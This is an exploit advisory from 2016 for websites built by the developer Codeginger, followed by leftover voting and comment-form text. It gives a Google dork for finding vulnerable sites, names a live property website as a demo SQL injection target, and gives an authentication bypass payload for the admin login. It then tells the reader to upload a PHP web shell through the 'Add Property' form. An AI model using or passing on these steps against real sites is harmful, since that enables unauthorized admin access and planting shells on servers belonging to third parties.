Codeginger Full Vulnerability & Upload Shell

2016.08.06

MrHoudini (IR)

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: intext:"Design & Developed by Codeginger"

# Exploit Title : Codeginger Full Vulnerability & Upload Shell
# Google Dork : intext:"Design & Developed by Codeginger"
# Discovered By : MrHoudini
# Contact Me : Mr.Houdini77@Gmail.com
# My WebSite : http://www.MrHoudini.ir
# Date : 5-8-2016
# Vendor Hompage : http://www.codeginger.com/
# Tested On : Windows


Poc : 

SQL Injection :

Demo : 

http://ajmeraproperty.com/product-details.php?id=548

Admin Page Bypass : 

http://ajmeraproperty.com/admin/

Upload Shell :

Login as Admin and the click on "Add Property" Then Upload Your Shell as : shell.php 

Username : '=' 'or'
Password : '=' 'or'

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Codeginger Full Vulnerability & Upload Shell

Dork: intext:"Design & Developed by Codeginger"

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Codeginger Full Vulnerability & Upload Shell

Dork: intext:"Design & Developed by Codeginger"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.